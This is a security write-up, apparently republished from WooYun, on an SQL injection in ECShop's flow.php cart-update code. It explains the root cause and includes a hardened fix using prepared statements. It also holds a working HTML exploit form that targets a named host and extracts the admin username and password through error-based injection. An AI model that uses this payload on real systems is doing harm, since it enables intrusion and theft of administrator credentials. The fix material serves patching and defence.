Ecshop has multiple SQL injection vulnerabilities – flow.php


Source: http://www.wooyun.org/bugs/wooyun-2012-011066

Details:

flow.php
[php]
elseif ($_REQUEST['step'] == 'update_cart')
{
    if (isset($_POST['goods_number']) && is_array($_POST['goods_number']))
    {
        flow_update_cart($_POST['goods_number']);
    }
    show_message($_LANG['update_cart_notice'], $_LANG['back_to_cart'], 'flow.php');
    exit;
}
[/php]

[php]
function flow_update_cart($arr)
{
    /* Process */
    foreach ($arr AS $key => $val)
    {
        $val = intval(make_semiangle($val));
        if ($val <= 0 && !is_numeric($key))
        {
            continue;
        }
        // Query:
        $sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" .$GLOBALS['ecs']->table('cart').
               " WHERE rec_id='$key' AND session_id='" . SESS_ID . "'";
        $goods = $GLOBALS['db']->getRow($sql);

        $sql = "SELECT g.goods_name, g.goods_number ".
               "FROM " .$GLOBALS['ecs']->table('goods'). " AS g, ".
               $GLOBALS['ecs']->table('cart'). " AS c ".
               "WHERE g.goods_id = c.goods_id AND c.rec_id = '$key'";
        $row = $GLOBALS['db']->getRow($sql);
        // Query: stock tracking is enabled, check whether the entered quantity is valid
        if (intval($GLOBALS['_CFG']['use_storage']) > 0 && $goods['extension_code'] != 'package_buy')
        {
            if ($row['goods_number'] < $val)
            {
                show_message(sprintf($GLOBALS['_LANG']['stock_insufficiency'], $row['goods_name'],
                    $row['goods_number'], $row['goods_number']));
                exit;
            }
            /* It is a product */
            $goods['product_id'] = trim($goods['product_id']);
            if (!empty($goods['product_id']))
            {
[/php]
The global filtering only handles the array values; the keys are not handled, which causes the vulnerability.

[html]
<form name="myform" method="post" action="http://yezi.us/flow.php?step=update_cart" enctype="multipart/form-data">
<input type="text" name="goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1]" value="21aaa">
<input type="submit" value="Do it"><br>
Ecshop SQL Injection Exp [4 Fucker Team]
</form>
[/html]
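The root cause above is that `$key` (the `rec_id` taken from the `goods_number[...]` array index) is interpolated into the SQL text, and the `!is_numeric($key)` test only skips a row when the quantity is also zero or negative. As an added example, not ECShop's own code, here is the shape of the fix a maintainer would apply: array keys are accepted only when PHP has already turned them into positive integers, and the queries bind `rec_id` and `session_id` as parameters instead of concatenating them. It uses PDO with an in-memory SQLite table named after ECShop's cart table; the table, session ids and request array are constructed for the demo and do not come from the report.

```php
<?php
// Added example (not ECShop code): hardened cart-update loop for flow.php step=update_cart.
// Assumes a PDO connection and a cart table with rec_id, session_id, goods_id, goods_number.
declare(strict_types=1);

/**
 * Keep only entries whose key is a positive integer rec_id and whose quantity is > 0.
 * PHP converts purely numeric string keys to int, so any key that is still a string
 * (e.g. one containing a quote) is not a valid rec_id and is collected in $rejected.
 */
function sanitize_cart_input(array $goodsNumber, array &$rejected = []): array
{
    $clean = [];
    foreach ($goodsNumber as $key => $val) {
        if (!is_int($key) || $key <= 0) {
            $rejected[] = (string) $key;
            continue;
        }
        $qty = (int) $val;           // ECShop additionally normalises full-width digits here
        if ($qty <= 0) {
            continue;                // same skip as the original, now independent of the key
        }
        $clean[$key] = $qty;
    }
    return $clean;
}

/**
 * Update quantities for the caller's session. rec_id never reaches the SQL text:
 * both statements are prepared once and executed with bound parameters.
 */
function flow_update_cart_safe(PDO $db, string $sessionId, array $goodsNumber): array
{
    $rejected = [];
    $updated  = [];
    $select = $db->prepare(
        'SELECT rec_id, goods_number FROM ecs_cart WHERE rec_id = :rec_id AND session_id = :sid'
    );
    $update = $db->prepare(
        'UPDATE ecs_cart SET goods_number = :qty WHERE rec_id = :rec_id AND session_id = :sid'
    );

    foreach (sanitize_cart_input($goodsNumber, $rejected) as $recId => $qty) {
        $select->execute([':rec_id' => $recId, ':sid' => $sessionId]);
        if ($select->fetch(PDO::FETCH_ASSOC) === false) {
            continue;                // row does not belong to this session
        }
        $update->execute([':qty' => $qty, ':rec_id' => $recId, ':sid' => $sessionId]);
        $updated[$recId] = $qty;
    }

    if ($rejected !== []) {
        // The real cart form only ever emits integer rec_ids, so a non-integer key is
        // a tampered request; log it so it can be alerted on.
        error_log('flow.php update_cart: rejected rec_id keys: ' . implode(', ', $rejected));
    }
    return $updated;
}

// Constructed fixture (not real shop data): two cart rows belonging to two sessions.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE ecs_cart (rec_id INTEGER PRIMARY KEY, session_id TEXT, goods_id INTEGER, goods_number INTEGER)');
$db->exec("INSERT INTO ecs_cart VALUES (7, 'sess-A', 100, 1), (8, 'sess-B', 101, 1)");

// Constructed request: one honest key, one key for another session's row, one tampered key.
$post = [7 => '3', 8 => '2', "7'" => '5'];
var_dump(flow_update_cart_safe($db, 'sess-A', $post));
```

Running it updates only rec_id 7: rec_id 8 is skipped because the bound `session_id` does not match, and the key `7'` is dropped before any SQL is built and reported through `error_log`. Validating the key type is the cheap fix; binding the parameters is what removes the injection even if a future change loosens the key check.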

One frustrating thing, though~

It turns out Xiao Ming had already nailed this hole back in 2010.

http://www.myhack58.com/Article/html/3/62/2010/26956.htm
